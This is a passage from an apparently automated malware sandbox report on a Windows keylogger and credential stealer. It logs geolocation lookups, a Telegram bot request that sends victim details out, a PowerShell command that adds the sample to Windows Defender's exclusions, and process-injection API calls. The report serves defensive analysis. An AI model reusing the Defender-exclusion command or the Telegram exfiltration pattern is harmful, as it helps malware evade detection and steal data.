2024-11-01 03:49:16 UTC	1210	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 03:49:16 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: dcb7f8fd-cb89-43da-858d-6f4f77c7b6b0 x-amzn-trace-id: Root=1-67244fb1-0547127a4d31c545397ac2c8;Parent=30ed2c4e00ab7389;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 a271e07df9c41dd2c067133c2d7094f0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: JJhBUDOUMs3p8bjG7il8adLMdGX07bMRaaR4wWJNrS_PeJVXxOHsgA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 11 Last-Modified: Fri, 01 Nov 2024 03:49:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LUfb%2FN4WMJ865SNBIznNUr3qXzLE266nf0p0fvGeKXJbQWFg939ooE6MlPfUxwy83zMaqJxRBjyYpM5hDqep0J1Wk4T2JoVOgyd2qu4bm0itfydGVygTpS50iPIeB04hDChNebLt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db8e9f76d6f6c54-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2443881&cwnd=250&unsent_bytes=0&cid=7b39a66dbdbd4c21&ts=156&x=0"
2024-11-01 03:49:16 UTC	159	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 Data Ascii: <Response><IP>173.254.250.82</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</R
2024-11-01 03:49:16 UTC	200	IN	Data Raw: 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: egionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49752	188.114.97.3	443	7620	C:\Users\user\Desktop\2Lzx7LMDWV.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 03:49:17 UTC	63	OUT	GET /xml/173.254.250.82 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-01 03:49:17 UTC	1218	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 03:49:17 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: dcb7f8fd-cb89-43da-858d-6f4f77c7b6b0 x-amzn-trace-id: Root=1-67244fb1-0547127a4d31c545397ac2c8;Parent=30ed2c4e00ab7389;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 a271e07df9c41dd2c067133c2d7094f0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: JJhBUDOUMs3p8bjG7il8adLMdGX07bMRaaR4wWJNrS_PeJVXxOHsgA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 12 Last-Modified: Fri, 01 Nov 2024 03:49:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B8Zx8FKaULWvJpBWQn3%2FaPpoy%2F6NssserqGd0iNx8U4kjn85D38qJs8oCMRtm4I5Z2tfJz9UmaX8WzNosEI097drnqkV2INHQlMtNt4%2F8MlMVVwPYfHdIZR%2Bu6Fenii9AtOHWhre"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db8ea01af73e9c6-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1365&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2083453&cwnd=245&unsent_bytes=0&cid=ba66108a2bb00851&ts=157&x=0"
2024-11-01 03:49:17 UTC	151	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e Data Ascii: <Response><IP>173.254.250.82</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>
2024-11-01 03:49:17 UTC	208	IN	Data Raw: 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49754	149.154.167.220	443	7620	C:\Users\user\Desktop\2Lzx7LMDWV.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 03:49:18 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2001/11/2024%20/%2015:20:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-11-01 03:49:18 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 01 Nov 2024 03:49:18 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-01 03:49:18 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	23:48:59
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\2Lzx7LMDWV.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\2Lzx7LMDWV.exe"
Imagebase:	0x1b0000
File size:	1'039'360 bytes
MD5 hash:	F70379292F5C009D309AA771803B8A47
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	23:49:01
Start date:	31/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2Lzx7LMDWV.exe"
Imagebase:	0x6a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	23:49:01
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	23:49:01
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\2Lzx7LMDWV.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\2Lzx7LMDWV.exe"
Imagebase:	0xa50000
File size:	1'039'360 bytes
MD5 hash:	F70379292F5C009D309AA771803B8A47
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.4145541161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4145541161.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	23:49:03
Start date:	31/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.6%
Total number of Nodes:	182
Total number of Limit Nodes:	13

Executed Functions

Function 0514793C Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05147B7E

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 5468e2cd93de6c615e16964aa4ec97a8e2d835ffd6f29c2303264fcf09979b00
Instruction ID: 4b57a8bcf8b8f4f2a33fd4dbb83a923eedc3eccd52c4ea1626e1f3d05dfa9056
Opcode Fuzzy Hash: 5468e2cd93de6c615e16964aa4ec97a8e2d835ffd6f29c2303264fcf09979b00
Instruction Fuzzy Hash: 6BA16F71D00219DFDB14CFA8C845BEDBBB2FF48314F1485A9E859A7280DB749A86CF91

Function 0514B288 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d252ca7dedd7c693aade73bd644cde9fc36d0158e50400aa730afe9df06cd02
Instruction ID: 95dff99fe14c035261be938c48628dd95b726a9bdac82fa09d998f6b7003d0d1
Opcode Fuzzy Hash: 3d252ca7dedd7c693aade73bd644cde9fc36d0158e50400aa730afe9df06cd02
Instruction Fuzzy Hash: 69E1CD70B056088FDB29EB75C460BAEB7F6AF88700F14446DE14ADB295DB35EC02CB51

Function 009FD289 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 009FD316
GetCurrentThread.KERNEL32 ref: 009FD353
GetCurrentProcess.KERNEL32 ref: 009FD390
GetCurrentThreadId.KERNEL32 ref: 009FD3E9

Memory Dump Source

Source File: 00000000.00000002.1719147032.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f0000_2Lzx7LMDWV.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 15957fa454fb6b1e74a33a0154c36c030bc0887cd875763398dcb80c49994fc3
Instruction ID: df4a4bedfac6745f7e67883849d40f761a7f5e02f59e14078920610c73bd6566
Opcode Fuzzy Hash: 15957fa454fb6b1e74a33a0154c36c030bc0887cd875763398dcb80c49994fc3
Instruction Fuzzy Hash: 595166B0D027098FDB14DFA9D548BEEBBF1AF48314F208459D109A7360D7749984CB66

Function 009FD298 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 009FD316
GetCurrentThread.KERNEL32 ref: 009FD353
GetCurrentProcess.KERNEL32 ref: 009FD390
GetCurrentThreadId.KERNEL32 ref: 009FD3E9

Memory Dump Source

Source File: 00000000.00000002.1719147032.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f0000_2Lzx7LMDWV.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 471c80864f7c820fc22a3b5e7a8fdb83230c6d2ed9d4d111ceb664cdcd522bc8
Instruction ID: 8c99dc7bfb8e25fc4974aa01d64c449a802c8106cb531185059158bd16717b50
Opcode Fuzzy Hash: 471c80864f7c820fc22a3b5e7a8fdb83230c6d2ed9d4d111ceb664cdcd522bc8
Instruction Fuzzy Hash: 795145B0D016098FDB14DFAAD548BEEBBF1BF88314F208469E119A7360D7749984CB69

Function 05147948 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05147B7E

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8673b7dcbc9c5399ce6203529155a5f9ba99bae0fc33bcc5f02fa7d2c4d7c44d
Instruction ID: feea87e8a314fbf27af6caebed7782d2ce6b60190a9a6f41c6c89e016f732dfd
Opcode Fuzzy Hash: 8673b7dcbc9c5399ce6203529155a5f9ba99bae0fc33bcc5f02fa7d2c4d7c44d
Instruction Fuzzy Hash: 15916E71D00219DFDB24CF68C845BEDBBB2FF48314F1485A9E859A7280DB749A86CF91

Function 009FAED7 Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 009FB13E

Memory Dump Source

Source File: 00000000.00000002.1719147032.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f0000_2Lzx7LMDWV.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: eb4bf57829423386857a7e1554d095c21b1ed6cf58bad22a292759e4d2e39d6d
Instruction ID: 62f69996c15e82acaefa2e48f02c9bb88f07973b8afb6f06702f3c9b84e93eb3
Opcode Fuzzy Hash: eb4bf57829423386857a7e1554d095c21b1ed6cf58bad22a292759e4d2e39d6d
Instruction Fuzzy Hash: B88157B0A00B098FD724DF29D4517AABBF5FF88300F00892DE58ACBA50D775E949CB91

Function 009F44B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 009F59A9

Memory Dump Source

Source File: 00000000.00000002.1719147032.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f0000_2Lzx7LMDWV.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: fbb7c80a6991482a104fb0bf83df07afaf36cf2e53348789f270317da5886495
Instruction ID: bf654d5fec0cdc2f296d546f331ddb49139228fdf346ae705d47d614da159d43
Opcode Fuzzy Hash: fbb7c80a6991482a104fb0bf83df07afaf36cf2e53348789f270317da5886495
Instruction Fuzzy Hash: 2641CFB0C0061DCFDB24DFA9C844A9EBBB5BF88304F20856AD508AB255DB756985CF90

Function 009F58F0 Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 009F59A9

Memory Dump Source

Source File: 00000000.00000002.1719147032.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f0000_2Lzx7LMDWV.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2f814f860b2ce7555ef088cea8224657ce306c0d58f0a483a0ca4c39dace703d
Instruction ID: 6b17227af3c41220236a8a754372bc2b2c08049936214558d5958473abbfcb44
Opcode Fuzzy Hash: 2f814f860b2ce7555ef088cea8224657ce306c0d58f0a483a0ca4c39dace703d
Instruction Fuzzy Hash: 2141DFB0C0061DCFDB24DFA9C9847DDBBB5BF88304F24816AD508AB255DB756986CF90

Function 051476B9 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05147750

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 7557fbfbe82be1bfe81c763edd06dad8732caaf42d573e02afab488e80eb6bba
Instruction ID: c6c7701c189f333a819e86ea452f7c9142078abd8be1655a5ab7fb015628f3ce
Opcode Fuzzy Hash: 7557fbfbe82be1bfe81c763edd06dad8732caaf42d573e02afab488e80eb6bba
Instruction Fuzzy Hash: 4F2157B59003598FCB10DFA9C985BDEBBF1FF48310F14842AE559A7240C7789954CFA4

Function 051476C0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05147750

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d64c56dac31650e689194591854f9075b0bfca7c918bbd596b4725005e702200
Instruction ID: 02990564dd9b5a95ef86da0d9ddc9d6037191474ba6b6d7adf0360e9c5b40684
Opcode Fuzzy Hash: d64c56dac31650e689194591854f9075b0bfca7c918bbd596b4725005e702200
Instruction Fuzzy Hash: CE2155B59003499FCB10DFA9C984BDEBBF5FF48320F50842AE959A7240C7789944CFA4

Function 05147521 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 051475A6

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8a1f36ebd491fcdbd891d5b639912121bd84e0f56bb372d4de46d3b5db1bc832
Instruction ID: 64410671b4f83a78559a3000a22b0dcdb30e5a15519038f82708aa56317357f4
Opcode Fuzzy Hash: 8a1f36ebd491fcdbd891d5b639912121bd84e0f56bb372d4de46d3b5db1bc832
Instruction Fuzzy Hash: 4E2168B1D002088FDB10DFA9C4847EEBBF1EF88320F14842AD459AB240D7789945CFA4

Function 009FD4D9 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009FD567

Memory Dump Source

Source File: 00000000.00000002.1719147032.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f0000_2Lzx7LMDWV.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1191a9b4e5019615bff8aeee1ab49a11cd74a645e1f22c47c368b215f869599b
Instruction ID: 07aeab7fbff721f984da275310e722728491a18a6b29657fc1320e5965b2e7de
Opcode Fuzzy Hash: 1191a9b4e5019615bff8aeee1ab49a11cd74a645e1f22c47c368b215f869599b
Instruction Fuzzy Hash: AD2112B5D01208DFDB10CFAAD984AEEBFF4EB48324F10801AE918A7310D374A940CFA1

Function 051477A9 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05147830

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 046a937a13be63048bd8054d4289a730097bea42f6fa0ccbbcee597ff8ece8d3
Instruction ID: 52c68e50f176765455a21aaeab386c1f9ef1148c8eeabd1f24b1d72f19df6c43
Opcode Fuzzy Hash: 046a937a13be63048bd8054d4289a730097bea42f6fa0ccbbcee597ff8ece8d3
Instruction Fuzzy Hash: 962148B5D002599FCB10CFA9C980BDEBBF1FF48310F10842AE558A7250D7789545CFA4

Function 05147528 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 051475A6

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: fbffb39ec9e57844c4eab9db165ef786c216d941cbbb7b79a7aa74ee641072e1
Instruction ID: d59744df78b721a2f037b56d6019ac92648db29fa803dd06b0c38d82503235e1
Opcode Fuzzy Hash: fbffb39ec9e57844c4eab9db165ef786c216d941cbbb7b79a7aa74ee641072e1
Instruction Fuzzy Hash: DF2149B1D003498FDB10DFAAC4857EEBBF4EF88324F10842AD459AB240D778A945CFA4

Function 051477B0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05147830

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_2Lzx7LMDWV.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ab1f43fab6f217afd07717270e80f5c349ff14febcebb9ddef97e67e48df2875
Instruction ID: 724f474bef5c75004e0bba036300bc3c461c0b94ca5b26a2e364a13a480eb695
Opcode Fuzzy Hash: ab1f43fab6f217afd07717270e80f5c349ff14febcebb9ddef97e67e48df2875
Instruction Fuzzy Hash: 512148B1C002499FCB10CFAAC880ADEFBF5FF48310F10842AE558A7250C778A940CFA4

Function 009FD4E0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009FD567

Memory Dump Source

Source File: 00000000.00000002.1719147032.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f0000_2Lzx7LMDWV.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0cf1dcf35564da0c78a696238cfce8c0172bb1ffdd5e00882d35b7bcdd73a88d
Instruction ID: 5726f30c2dc38e447090f269555cca9b28dc13489f3f3d43e3e3aea8b20a2b44
Opcode Fuzzy Hash: 0cf1dcf35564da0c78a696238cfce8c0172bb1ffdd5e00882d35b7bcdd73a88d
Instruction Fuzzy Hash: C521E4B5D01248DFDB10CFAAD984ADEBFF9EB48314F14801AE918A3310D374A940CFA4

Function 051475F9 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0514766E

Memory Dump Source

Source File: 00000000.00000002.1723345637.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

